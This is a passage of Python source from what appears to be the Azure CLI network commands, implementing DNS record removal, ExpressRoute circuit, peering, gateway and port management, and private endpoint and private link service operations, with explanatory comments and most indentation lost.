def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
return globals()["_check_{}_record_exist".format(record_type)]
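# _record_exist_func dispatches to the _check_<type>_record_exist helpers above by
# name, e.g. _record_exist_func('a') returns _check_a_record_exist and
# _record_exist_func('srv') returns _check_srv_record_exist. Supporting a new record
# type therefore only requires adding a matching helper to this module.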
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
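# _add_record handles the two shapes a record-set property can take: list-valued
# types (A, AAAA, MX, ...) are appended to, with the _check_*_record_exist helpers
# filtering out exact duplicates, while single-valued types (SOA and CNAME, per the
# is_list check used by the zone import above) simply overwrite the property.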
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
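# _add_save_record is a get-or-create helper: it fetches the existing record set and
# falls back to a fresh RecordSet(ttl=3600) when the GET fails, merges the new record
# in via _add_record, then PUTs the result. Passing if_none_match='*' maps onto HTTP
# If-None-Match semantics, i.e. the create_or_update call fails if the record set
# already exists rather than silently merging into it.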
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
if is_list:
records_remaining = len(getattr(record_set, record_property))
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
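# dict_matches_filter treats falsy filter values as wildcards and otherwise compares
# values as strings, falling back to order-insensitive list comparison. Illustrative
# behaviour (hypothetical values):
#
#   dict_matches_filter({'ipv4_address': '10.0.0.4'}, {'ipv4_address': '10.0.0.4'})  # True
#   dict_matches_filter({'ipv4_address': '10.0.0.5'}, {'ipv4_address': '10.0.0.4'})  # False
#   lists_match(['a', 'b'], ['b', 'a'])  # True  (Counter ignores ordering)
#   lists_match([['a']], [['a']])        # False (unhashable items raise TypeError)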
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
if cmd.supported_api_version(min_api='2010-07-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
            instance.service_provider_properties.bandwidth_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
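# Note: provider-based circuits carry their bandwidth on service_provider_properties
# in Mbps, while ExpressRoute Direct (port-based) circuits use bandwidth_in_gbps,
# hence the Mbps -> Gbps conversion above (e.g. 10000 Mbps becomes 10.0 Gbps).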
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
return version == IPv6Network
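# _validate_ipv6_address_prefixes returns True only when every prefix parses as IPv6,
# False when every prefix is IPv4, and raises CLIError for a mixed or unparsable
# list. For illustration:
#
#   _validate_ipv6_address_prefixes(['2001:db8::/64'])                 # True
#   _validate_ipv6_address_prefixes(['10.0.0.0/24', '10.1.0.0/24'])    # False
#   _validate_ipv6_address_prefixes(['10.0.0.0/24', '2001:db8::/64'])  # CLIError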
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable\
= cmd.get_models('ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
instance.express_route_connection_id = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
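# The routing configuration of an ExpressRoute connection is built lazily above:
# RoutingConfiguration and PropagatedRouteTable objects are only instantiated when
# associated_route_table, propagated_route_tables or labels is supplied, so updates
# that touch none of them leave the existing routing configuration untouched.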
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
    if min_val or max_val:
gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
                bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min_val, max=max_val))
if tags is not None:
instance.tags = tags
    if min_val is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.min = min_val
    if max_val is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.max = max_val
return instance
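# The autoscale bounds control how many scale units the ExpressRoute gateway may use:
# min_val/max_val are written into auto_scale_configuration.bounds, and the
# configuration object is created lazily the first time either bound is supplied on
# update.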
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
elif basename.endswith('.pdf') is False:
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
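# Note: supplying any one MACsec argument above rewrites the link's whole
# mac_sec_config (unset identifiers become None), and the cipher value is normalised
# from the CLI's lower-case form ('gcm-aes-128'/'gcm-aes-256') to the casing the
# service expects ('GcmAes128'/'GcmAes256'); unknown values pass through unchanged so
# newer ciphers keep working once the REST spec issue referenced above is fixed.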
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
        visibility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
